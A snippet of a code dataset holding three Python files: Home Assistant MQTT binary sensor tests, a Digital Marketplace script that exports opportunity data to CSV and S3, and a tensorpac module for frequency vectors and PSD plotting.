state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", b\"\\x01\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", b\"\\x00\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n\nasync def test_setting_sensor_value_via_mqtt_message_empty_template(\n hass, mqtt_mock, caplog\n):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"value_template\": '{%if value == \"ABC\"%}ON{%endif%}',\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"DEF\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n assert \"Empty template output\" in caplog.text\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ABC\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n\nasync def test_valid_device_class(hass, mqtt_mock):\n \"\"\"Test the setting of a valid sensor class.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"device_class\": \"motion\",\n \"state_topic\": \"test-topic\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert 
state.attributes.get(\"device_class\") == \"motion\"\n\n\nasync def test_invalid_device_class(hass, mqtt_mock):\n \"\"\"Test the setting of an invalid sensor class.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"device_class\": \"abc123\",\n \"state_topic\": \"test-topic\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state is None\n\n\nasync def test_availability_when_connection_lost(hass, mqtt_mock):\n \"\"\"Test availability after MQTT disconnection.\"\"\"\n await help_test_availability_when_connection_lost(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_availability_without_topic(hass, mqtt_mock):\n \"\"\"Test availability without defined availability topic.\"\"\"\n await help_test_availability_without_topic(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_default_availability_payload(hass, mqtt_mock):\n \"\"\"Test availability by default payload with defined topic.\"\"\"\n await help_test_default_availability_payload(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_custom_availability_payload(hass, mqtt_mock):\n \"\"\"Test availability by custom payload with defined topic.\"\"\"\n await help_test_custom_availability_payload(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_force_update_disabled(hass, mqtt_mock):\n \"\"\"Test force update option.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n }\n },\n )\n await hass.async_block_till_done()\n\n events = []\n\n @ha.callback\n def callback(event):\n \"\"\"Verify event got called.\"\"\"\n events.append(event)\n\n hass.bus.async_listen(EVENT_STATE_CHANGED, callback)\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n assert len(events) == 1\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n assert len(events) == 1\n\n\nasync def test_force_update_enabled(hass, mqtt_mock):\n \"\"\"Test force update option.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"force_update\": True,\n }\n },\n )\n await hass.async_block_till_done()\n\n events = []\n\n @ha.callback\n def callback(event):\n \"\"\"Verify event got called.\"\"\"\n events.append(event)\n\n hass.bus.async_listen(EVENT_STATE_CHANGED, callback)\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n assert len(events) == 1\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n assert len(events) == 2\n\n\nasync def test_off_delay(hass, mqtt_mock):\n \"\"\"Test off_delay option.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"off_delay\": 30,\n \"force_update\": True,\n }\n },\n )\n await hass.async_block_till_done()\n\n events = []\n\n 
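    # off_delay=30 makes the binary sensor revert to OFF automatically 30
    # seconds after the last ON payload; the listener defined below records
    # state-changed events so the test can count the ON updates and then
    # assert the delayed reset once time is advanced past the off_delay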
@ha.callback\n def callback(event):\n \"\"\"Verify event got called.\"\"\"\n events.append(event)\n\n hass.bus.async_listen(EVENT_STATE_CHANGED, callback)\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n assert len(events) == 1\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n assert len(events) == 2\n\n async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=30))\n await hass.async_block_till_done()\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n assert len(events) == 3\n\n\nasync def test_setting_attribute_via_mqtt_json_message(hass, mqtt_mock):\n \"\"\"Test the setting of attribute via MQTT with JSON payload.\"\"\"\n await help_test_setting_attribute_via_mqtt_json_message(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_setting_attribute_with_template(hass, mqtt_mock):\n \"\"\"Test the setting of attribute via MQTT with JSON payload.\"\"\"\n await help_test_setting_attribute_with_template(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_update_with_json_attrs_not_dict(hass, mqtt_mock, caplog):\n \"\"\"Test attributes get extracted from a JSON result.\"\"\"\n await help_test_update_with_json_attrs_not_dict(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_update_with_json_attrs_bad_JSON(hass, mqtt_mock, caplog):\n \"\"\"Test attributes get extracted from a JSON result.\"\"\"\n await help_test_update_with_json_attrs_bad_JSON(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_discovery_update_attr(hass, mqtt_mock, caplog):\n \"\"\"Test update of discovered MQTTAttributes.\"\"\"\n await help_test_discovery_update_attr(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_unique_id(hass, mqtt_mock):\n \"\"\"Test unique id option only creates one sensor per unique_id.\"\"\"\n config = {\n binary_sensor.DOMAIN: [\n {\n \"platform\": \"mqtt\",\n \"name\": \"Test 1\",\n \"state_topic\": \"test-topic\",\n \"unique_id\": \"TOTALLY_UNIQUE\",\n },\n {\n \"platform\": \"mqtt\",\n \"name\": \"Test 2\",\n \"state_topic\": \"test-topic\",\n \"unique_id\": \"TOTALLY_UNIQUE\",\n },\n ]\n }\n await help_test_unique_id(hass, mqtt_mock, binary_sensor.DOMAIN, config)\n\n\nasync def test_discovery_removal_binary_sensor(hass, mqtt_mock, caplog):\n \"\"\"Test removal of discovered binary_sensor.\"\"\"\n data = json.dumps(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n await help_test_discovery_removal(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, data\n )\n\n\nasync def test_discovery_update_binary_sensor_topic_template(hass, mqtt_mock, caplog):\n \"\"\"Test update of discovered binary_sensor.\"\"\"\n config1 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config2 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config1[\"name\"] = \"Beer\"\n config2[\"name\"] = \"Milk\"\n config1[\"state_topic\"] = \"sensor/state1\"\n config2[\"state_topic\"] = \"sensor/state2\"\n config1[\"value_template\"] = \"{{ value_json.state1.state }}\"\n config2[\"value_template\"] = \"{{ value_json.state2.state }}\"\n\n state_data1 = [\n ([(\"sensor/state1\", '{\"state1\":{\"state\":\"ON\"}}')], \"on\", None),\n ]\n state_data2 = [\n 
([(\"sensor/state2\", '{\"state2\":{\"state\":\"OFF\"}}')], \"off\", None),\n ([(\"sensor/state2\", '{\"state2\":{\"state\":\"ON\"}}')], \"on\", None),\n ([(\"sensor/state1\", '{\"state1\":{\"state\":\"OFF\"}}')], \"on\", None),\n ([(\"sensor/state1\", '{\"state2\":{\"state\":\"OFF\"}}')], \"on\", None),\n ([(\"sensor/state2\", '{\"state1\":{\"state\":\"OFF\"}}')], \"on\", None),\n ([(\"sensor/state2\", '{\"state2\":{\"state\":\"OFF\"}}')], \"off\", None),\n ]\n\n await help_test_discovery_update(\n hass,\n mqtt_mock,\n caplog,\n binary_sensor.DOMAIN,\n config1,\n config2,\n state_data1=state_data1,\n state_data2=state_data2,\n )\n\n\nasync def test_discovery_update_binary_sensor_template(hass, mqtt_mock, caplog):\n \"\"\"Test update of discovered binary_sensor.\"\"\"\n config1 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config2 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config1[\"name\"] = \"Beer\"\n config2[\"name\"] = \"Milk\"\n config1[\"state_topic\"] = \"sensor/state1\"\n config2[\"state_topic\"] = \"sensor/state1\"\n config1[\"value_template\"] = \"{{ value_json.state1.state }}\"\n config2[\"value_template\"] = \"{{ value_json.state2.state }}\"\n\n state_data1 = [\n ([(\"sensor/state1\", '{\"state1\":{\"state\":\"ON\"}}')], \"on\", None),\n ]\n state_data2 = [\n ([(\"sensor/state1\", '{\"state2\":{\"state\":\"OFF\"}}')], \"off\", None),\n ([(\"sensor/state1\", '{\"state2\":{\"state\":\"ON\"}}')], \"on\", None),\n ([(\"sensor/state1\", '{\"state1\":{\"state\":\"OFF\"}}')], \"on\", None),\n ([(\"sensor/state1\", '{\"state2\":{\"state\":\"OFF\"}}')], \"off\", None),\n ]\n\n await help_test_discovery_update(\n hass,\n mqtt_mock,\n caplog,\n binary_sensor.DOMAIN,\n config1,\n config2,\n state_data1=state_data1,\n state_data2=state_data2,\n )\n\n\nasync def test_discovery_update_unchanged_binary_sensor(hass, mqtt_mock, caplog):\n \"\"\"Test update of discovered binary_sensor.\"\"\"\n config1 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config1[\"name\"] = \"Beer\"\n\n data1 = json.dumps(config1)\n with patch(\n \"homeassistant.components.mqtt.binary_sensor.MqttBinarySensor.discovery_update\"\n ) as discovery_update:\n await help_test_discovery_update_unchanged(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, data1, discovery_update\n )\n\n\n@pytest.mark.no_fail_on_log_exception\nasync def test_discovery_broken(hass, mqtt_mock, caplog):\n \"\"\"Test handling of bad discovery message.\"\"\"\n data1 = '{ \"name\": \"Beer\",' ' \"off_delay\": -1 }'\n data2 = '{ \"name\": \"Milk\",' ' \"state_topic\": \"test_topic\" }'\n await help_test_discovery_broken(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, data1, data2\n )\n\n\nasync def test_entity_device_info_with_connection(hass, mqtt_mock):\n \"\"\"Test MQTT binary sensor device registry integration.\"\"\"\n await help_test_entity_device_info_with_connection(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_device_info_with_identifier(hass, mqtt_mock):\n \"\"\"Test MQTT binary sensor device registry integration.\"\"\"\n await help_test_entity_device_info_with_identifier(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_device_info_update(hass, mqtt_mock):\n \"\"\"Test device registry update.\"\"\"\n await help_test_entity_device_info_update(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_device_info_remove(hass, mqtt_mock):\n \"\"\"Test device registry remove.\"\"\"\n await 
help_test_entity_device_info_remove(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_id_update_subscriptions(hass, mqtt_mock):\n \"\"\"Test MQTT subscriptions are managed when entity_id is updated.\"\"\"\n await help_test_entity_id_update_subscriptions(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_id_update_discovery_update(hass, mqtt_mock):\n \"\"\"Test MQTT discovery update when entity_id is updated.\"\"\"\n await help_test_entity_id_update_discovery_update(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_debug_info_message(hass, mqtt_mock):\n \"\"\"Test MQTT debug info.\"\"\"\n await help_test_entity_debug_info_message(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n"} {"ext": "py", "sha": "1a3085302cc1414cf1e002789ed0229e352be1e9", "content": "import csv\nfrom collections import OrderedDict\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Any, List, Mapping\n\nfrom dmutils.formats import DATE_FORMAT, DATETIME_FORMAT\nfrom dmutils.s3 import S3\n\nfrom dmscripts.helpers.s3_helpers import get_bucket_name\n\n# This URL is framework agnostic\nPUBLIC_BRIEF_URL = \"https://www.digitalmarketplace.service.gov.uk/digital-outcomes-and-specialists/opportunities/{}\"\n\nDOS_OPPORTUNITY_HEADERS = [\n \"ID\", \"Opportunity\", \"Link\", \"Framework\", \"Category\", \"Specialist\",\n \"Organisation Name\", \"Buyer Domain\", \"Location Of The Work\",\n \"Published At\", \"Open For\", \"Expected Contract Length\", \"Applications from SMEs\",\n \"Applications from Large Organisations\", \"Total Organisations\", \"Status\", \"Winning supplier\",\n \"Size of supplier\", \"Contract amount\", \"Contract start date\", \"Clarification questions\", \"Employment status\"\n]\n\nDOWNLOAD_FILE_NAME = \"opportunity-data.csv\"\n\n\ndef format_datetime_string_as_date(dt):\n return datetime.strptime(dt, DATETIME_FORMAT).strftime(DATE_FORMAT) if dt else None\n\n\ndef remove_username_from_email_address(ea):\n return '{}'.format(ea.split('@').pop()) if ea else None\n\n\ndef _build_row(\n brief: dict, brief_responses: List[dict], include_buyer_user_details: bool = False\n) -> OrderedDict:\n winner = None\n applications_from_sme_suppliers = 0\n applications_from_large_suppliers = 0\n\n for brief_response in brief_responses:\n if brief_response['supplierOrganisationSize'] == 'large':\n applications_from_large_suppliers += 1\n else:\n applications_from_sme_suppliers += 1\n\n if brief_response['status'] == 'awarded':\n winner = brief_response\n\n row = OrderedDict(zip(DOS_OPPORTUNITY_HEADERS, [\n brief['id'],\n brief['title'],\n PUBLIC_BRIEF_URL.format(brief['id']),\n brief['frameworkSlug'],\n brief['lotSlug'],\n brief.get('specialistRole', \"\"),\n brief['organisation'],\n remove_username_from_email_address(brief['users'][0]['emailAddress']),\n brief['location'],\n format_datetime_string_as_date(brief['publishedAt']),\n brief.get('requirementsLength', '2 weeks'), # only briefs on the specialists lot include 'requirementsLength'\n brief.get('contractLength', ''),\n applications_from_sme_suppliers,\n applications_from_large_suppliers,\n applications_from_sme_suppliers + applications_from_large_suppliers,\n brief['status'],\n winner['supplierName'] if winner else '',\n winner['supplierOrganisationSize'] if winner else '',\n winner['awardDetails']['awardedContractValue'] if winner else '',\n winner['awardDetails']['awardedContractStartDate'] if winner else '',\n 
len(brief['clarificationQuestions']),\n brief.get('employmentStatus', ''),\n ]))\n\n if include_buyer_user_details:\n buyer_user = brief[\"users\"][0]\n row.update([\n (\"Buyer user name\", buyer_user[\"name\"]),\n (\"Buyer email address\", buyer_user[\"emailAddress\"]),\n (\"Buyer phone number\", buyer_user.get(\"phoneNumber\", \"\")),\n ])\n\n return row\n\n\ndef get_latest_dos_framework(client) -> str:\n frameworks = client.find_frameworks()['frameworks']\n for framework in frameworks:\n # Should be maximum of 1 live DOS framework\n if framework['family'] == 'digital-outcomes-and-specialists' and framework['status'] == 'live':\n return framework['slug']\n return 'digital-outcomes-and-specialists'\n\n\ndef get_brief_data(client, logger, include_buyer_user_details: bool = False) -> list:\n logger.info(\"Fetching closed briefs from API\")\n briefs = client.find_briefs_iter(status=\"closed,awarded,unsuccessful,cancelled\", with_users=True,\n with_clarification_questions=True)\n rows = []\n for brief in briefs:\n logger.info(f\"Fetching brief responses for Brief ID {brief['id']}\")\n brief_responses = client.find_brief_responses_iter(brief_id=brief['id'])\n rows.append(_build_row(brief, brief_responses, include_buyer_user_details))\n return rows\n\n\ndef write_rows_to_csv(rows: List[Mapping[str, Any]], file_path: Path, logger) -> None:\n logger.info(f\"Writing rows to {file_path}\")\n\n # assumes all rows have the same keys\n fieldnames = list(rows[0].keys())\n\n with open(file_path, 'w') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames, delimiter=',', quotechar='\"')\n writer.writeheader()\n for row in rows:\n writer.writerow(row)\n\n\ndef upload_file_to_s3(\n file_path,\n bucket,\n remote_key_name: str,\n download_name: str,\n *,\n public: bool = True,\n dry_run: bool = False,\n logger,\n):\n with open(file_path, 'br') as source_file:\n acl = \"public-read\" if public else \"bucket-owner-full-control\"\n\n logger.info(\"{}UPLOAD: {} to s3://{}/{} with acl {}\".format(\n '[Dry-run]' if dry_run else '',\n file_path,\n bucket.bucket_name,\n remote_key_name,\n acl\n ))\n\n if not dry_run:\n # Save file\n bucket.save(\n remote_key_name,\n source_file,\n acl=acl,\n download_filename=download_name\n )\n\n\ndef export_dos_opportunities(\n client,\n logger,\n stage: str,\n output_dir,\n dry_run: bool = False\n):\n output_dir = Path(output_dir)\n if not output_dir.exists():\n logger.info(f\"Creating {output_dir} directory\")\n output_dir.mkdir(parents=True)\n\n latest_framework_slug = get_latest_dos_framework(client)\n\n communications_bucket = S3(get_bucket_name(stage, \"communications\"))\n reports_bucket = S3(get_bucket_name(stage, \"reports\"))\n\n logger.info(\"Exporting DOS opportunity data to CSV\")\n\n # Get the data\n rows = get_brief_data(client, logger, include_buyer_user_details=True)\n\n # Construct CSV for admins\n write_rows_to_csv(rows, output_dir / \"opportunity-data-for-admins.csv\", logger)\n # Construct public CSV (filter out buyer details)\n write_rows_to_csv(\n [\n OrderedDict((k, v) for k, v in row.items() if k in DOS_OPPORTUNITY_HEADERS)\n for row in rows\n ],\n output_dir / DOWNLOAD_FILE_NAME,\n logger\n )\n\n # Upload admin CSV to reports bucket\n upload_file_to_s3(\n output_dir / \"opportunity-data-for-admins.csv\",\n reports_bucket,\n f\"{latest_framework_slug}/reports/{DOWNLOAD_FILE_NAME}\",\n DOWNLOAD_FILE_NAME,\n public=False,\n dry_run=dry_run,\n logger=logger\n )\n\n # Upload public CSV to S3\n upload_file_to_s3(\n output_dir / DOWNLOAD_FILE_NAME,\n 
communications_bucket,\n f\"{latest_framework_slug}/communications/data/{DOWNLOAD_FILE_NAME}\",\n DOWNLOAD_FILE_NAME,\n public=True,\n dry_run=dry_run,\n logger=logger\n )\n"} {"ext": "py", "sha": "1a30887516fb47bb02abf1195fdda8c41a709f3c", "content": "\"\"\"Utility functions.\"\"\"\nimport logging\n\nimport numpy as np\nfrom scipy.signal import periodogram\n\nfrom tensorpac.methods.meth_pac import _kl_hr\nfrom tensorpac.pac import _PacObj, _PacVisual\nfrom tensorpac.io import set_log_level\n\nfrom matplotlib.gridspec import GridSpec\nimport matplotlib.pyplot as plt\n\nlogger = logging.getLogger('tensorpac')\n\n\ndef pac_vec(f_pha='mres', f_amp='mres'):\n \"\"\"Generate cross-frequency coupling vectors.\n\n Parameters\n ----------\n Frequency vector for the phase and amplitude. Here you can use\n several forms to define those vectors :\n\n * Basic list/tuple (ex: [2, 4] or [8, 12]...)\n * List of frequency bands (ex: [[2, 4], [5, 7]]...)\n * Dynamic definition : (start, stop, width, step)\n * Range definition (ex : np.arange(3) => [[0, 1], [1, 2]])\n * Using a string. `f_pha` and `f_amp` can be 'lres', 'mres', 'hres'\n respectively for low, middle and high resolution vectors. In that\n case, it uses the definition proposed by Bahramisharif et al. 2013\n :cite:`bahramisharif2013propagating` i.e\n f_pha = [f - f / 4, f + f / 4] and f_amp = [f - f / 8, f + f / 8]\n\n Returns\n -------\n f_pha, f_amp : array_like\n Arrays containing the pairs of phase and amplitude frequencies. Each\n vector have a shape of (N, 2).\n \"\"\"\n nb_fcy = dict(lres=10, mres=30, hres=50, demon=70, hulk=100)\n if isinstance(f_pha, str):\n # get where phase frequencies start / finish / number\n f_pha_start, f_pha_end = 2, 20\n f_pha_nb = nb_fcy[f_pha]\n # f_pha = [f - f / 4, f + f / 4]\n f_pha_mid = np.linspace(f_pha_start, f_pha_end, f_pha_nb)\n f_pha = np.c_[f_pha_mid - f_pha_mid / 4., f_pha_mid + f_pha_mid / 4.]\n if isinstance(f_amp, str):\n # get where amplitude frequencies start / finish / number\n f_amp_start, f_amp_end = 60, 160\n f_amp_nb = nb_fcy[f_amp]\n # f_amp = [f - f / 8, f + f / 8]\n f_amp_mid = np.linspace(f_amp_start, f_amp_end, f_amp_nb)\n f_amp = np.c_[f_amp_mid - f_amp_mid / 8., f_amp_mid + f_amp_mid / 8.]\n\n return _check_freq(f_pha), _check_freq(f_amp)\n\n\ndef _check_freq(f):\n \"\"\"Check the frequency definition.\"\"\"\n f = np.atleast_2d(np.asarray(f))\n #\n if len(f.reshape(-1)) == 1:\n raise ValueError(\"The length of f should at least be 2.\")\n elif 2 in f.shape: # f of shape (N, 2) or (2, N)\n if f.shape[1] is not 2:\n f = f.T\n elif np.squeeze(f).shape == (4,): # (f_start, f_end, f_width, f_step)\n f = _pair_vectors(*tuple(np.squeeze(f)))\n else: # Sequential\n f = f.reshape(-1)\n f.sort()\n f = np.c_[f[0:-1], f[1::]]\n return f\n\n\ndef _pair_vectors(f_start, f_end, f_width, f_step):\n # Generate two array for phase and amplitude :\n fdown = np.arange(f_start, f_end - f_width, f_step)\n fup = np.arange(f_start + f_width, f_end, f_step)\n return np.c_[fdown, fup]\n\n\ndef pac_trivec(f_start=60., f_end=160., f_width=10.):\n \"\"\"Generate triangular vector.\n\n By contrast with the pac_vec function, this function generate frequency\n vector with an increasing frequency bandwidth.\n\n Parameters\n ----------\n f_start : float | 60.\n Starting frequency.\n f_end : float | 160.\n Ending frequency.\n f_width : float | 10.\n Frequency bandwidth increase between each band.\n\n Returns\n -------\n f : array_like\n The triangular vector.\n tridx : array_like\n The triangular index for the 
reconstruction.\n \"\"\"\n starting = np.arange(f_start, f_end + f_width, f_width)\n f, tridx = np.array([]), np.array([])\n for num, k in enumerate(starting[0:-1]):\n # Lentgh of the vector to build :\n le = len(starting) - (num + 1)\n # Create the frequency vector for this starting frequency :\n fst = np.c_[np.full(le, k), starting[num + 1::]]\n nfst = fst.shape[0]\n # Create the triangular index for this vector of frequencies :\n idx = np.c_[np.flipud(np.arange(nfst)), np.full(nfst, num)]\n tridx = np.concatenate((tridx, idx), axis=0) if tridx.size else idx\n f = np.concatenate((f, fst), axis=0) if f.size else fst\n return f, tridx\n\n\nclass PSD(object):\n \"\"\"Power Spectrum Density for electrophysiological brain data.\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_epochs, n_times)\n sf : float\n The sampling frequency.\n \"\"\"\n\n def __init__(self, x, sf):\n \"\"\"Init.\"\"\"\n assert isinstance(x, np.ndarray) and (x.ndim == 2), (\n \"x should be a 2d array of shape (n_epochs, n_times)\")\n self._n_trials, self._n_times = x.shape\n logger.info(f\"Compute PSD over {self._n_trials} trials and \"\n f\"{self._n_times} time points\")\n self._freqs, self._psd = periodogram(x, fs=sf, window=None,\n nfft=self._n_times,\n detrend='constant',\n return_onesided=True,\n scaling='density', axis=1)\n\n def plot(self, f_min=None, f_max=None, confidence=95, interp=None,\n log=False, grid=True, fz_title=18, fz_labels=15):\n \"\"\"Plot the PSD.\n\n Parameters\n ----------\n f_min, f_max : (int, float) | None\n Frequency bounds to use for plotting\n confidence : (int, float) | None\n Light gray confidence interval. If None, no interval will be\n displayed\n interp : int | None\n Line interpolation integer. For example, if interp is 10 the number\n of points is going to be multiply by 10\n log : bool | False\n Use a log scale representation\n grid : bool | True\n Add a grid to the plot\n fz_title : int | 18\n Font size for the title\n fz_labels : int | 15\n Font size the x/y labels\n\n Returns\n -------\n ax : Matplotlib axis\n The matplotlib axis that contains the figure\n \"\"\"\n import matplotlib.pyplot as plt\n f_types = (int, float)\n # interpolation\n xvec, yvec = self._freqs, self._psd\n if isinstance(interp, int) and (interp > 1):\n # from scipy.interpolate import make_interp_spline, BSpline\n from scipy.interpolate import interp1d\n xnew = np.linspace(xvec[0], xvec[-1], len(xvec) * interp)\n f = interp1d(xvec, yvec, kind='quadratic', axis=1)\n yvec = f(xnew)\n xvec = xnew\n # (f_min, f_max)\n f_min = xvec[0] if not isinstance(f_min, f_types) else f_min\n f_max = xvec[-1] if not isinstance(f_max, f_types) else f_max\n # plot main psd\n plt.plot(xvec, yvec.mean(0), color='black',\n label='mean PSD over trials')\n # plot confidence interval\n if isinstance(confidence, (int, float)) and (0 < confidence < 100):\n logger.info(f\" Add {confidence}th confidence interval\")\n interval = (100. - confidence) / 2\n kw = dict(axis=0, interpolation='nearest')\n psd_min = np.percentile(yvec, interval, **kw)\n psd_max = np.percentile(yvec, 100. 
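# A minimal sketch of the 'mres' frequency-band construction described in the
# pac_vec docstring above: phase bands as [f - f/4, f + f/4] and amplitude
# bands as [f - f/8, f + f/8]. The start/stop/count values mirror the defaults
# shown there; everything else is illustrative.
import numpy as np

f_pha_mid = np.linspace(2, 20, 30)
f_pha = np.c_[f_pha_mid - f_pha_mid / 4., f_pha_mid + f_pha_mid / 4.]

f_amp_mid = np.linspace(60, 160, 30)
f_amp = np.c_[f_amp_mid - f_amp_mid / 8., f_amp_mid + f_amp_mid / 8.]

print(f_pha.shape, f_amp.shape)   # both (30, 2)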
- interval, **kw)\n plt.fill_between(xvec, psd_max, psd_min, color='lightgray',\n alpha=0.5,\n label=f\"{confidence}th confidence interval\")\n plt.legend(fontsize=fz_labels)\n plt.xlabel(\"Frequencies (Hz)\", fontsize=fz_labels)\n plt.ylabel(\"Power (V**2/Hz)\", fontsize=fz_labels)\n plt.title(f\"PSD mean over {self._n_trials} trials\", fontsize=fz_title)\n plt.xlim(f_min, f_max)\n if log:\n from matplotlib.ticker import ScalarFormatter\n plt.xscale('log', basex=10)\n plt.gca().xaxis.set_major_formatter(ScalarFormatter())\n if grid:\n plt.grid(color='grey', which='major', linestyle='-',\n linewidth=1., alpha=0.5)\n plt.grid(color='lightgrey', which='minor', linestyle='--',\n linewidth=0.5, alpha=0.5)\n\n return plt.gca()\n\n def plot_st_psd(self, f_min=None, f_max=None, log=False, grid=True,\n fz_title=18, fz_labels=15, fz_cblabel=15, **kw):\n \"\"\"Single-trial PSD plot.\n\n Parameters\n ----------\n f_min, f_max : (int, float) | None\n Frequency bounds to use for plotting\n log : bool | False\n Use a log scale representation\n grid : bool | True\n Add a grid to the plot\n fz_title : int | 18\n Font size for the title\n fz_labels : int | 15\n Font size the x/y labels\n fz_cblabel : int | 15\n Font size the colorbar label labels\n\n Returns\n -------\n ax : Matplotlib axis\n The matplotlib axis that contains the figure\n \"\"\"\n # manage input variables\n kw['fz_labels'] = kw.get('fz_labels', fz_labels)\n kw['fz_title'] = kw.get('fz_title', fz_title)\n kw['fz_cblabel'] = kw.get('fz_cblabel', fz_title)\n kw['xlabel'] = kw.get('xlabel', \"Frequencies (Hz)\")\n kw['ylabel'] = kw.get('ylabel', \"Trials\")\n kw['title'] = kw.get('title', \"Single-trial PSD\")\n kw['cblabel'] = kw.get('cblabel', \"Power (V**2/Hz)\")\n # (f_min, f_max)\n xvec, psd = self._freqs, self._psd\n f_types = (int, float)\n f_min = xvec[0] if not isinstance(f_min, f_types) else f_min\n f_max = xvec[-1] if not isinstance(f_max, f_types) else f_max\n # locate (f_min, f_max) indices\n f_min_idx = np.abs(xvec - f_min).argmin()\n f_max_idx = np.abs(xvec - f_max).argmin()\n sl_freq = slice(f_min_idx, f_max_idx)\n xvec = xvec[sl_freq]\n psd = psd[:, sl_freq]\n # make the 2D plot\n _viz = _PacVisual()\n trials = np.arange(self._n_trials)\n _viz.pacplot(psd, xvec, trials, **kw)\n if log:\n from matplotlib.ticker import ScalarFormatter\n plt.xscale('log', basex=10)\n plt.gca().xaxis.set_major_formatter(ScalarFormatter())\n if grid:\n plt.grid(color='grey', which='major', linestyle='-',\n linewidth=1., alpha=0.5)\n plt.grid(color='lightgrey', which='minor', linestyle='--',\n linewidth=0.5, alpha=0.5)\n\n return plt.gca()\n\n def show(self):\n \"\"\"Display the PSD figure.\"\"\"\n import matplotlib.pyplot as plt\n plt.show()\n\n @property\n def freqs(self):\n \"\"\"Get the frequency vector.\"\"\"\n return self._freqs\n\n 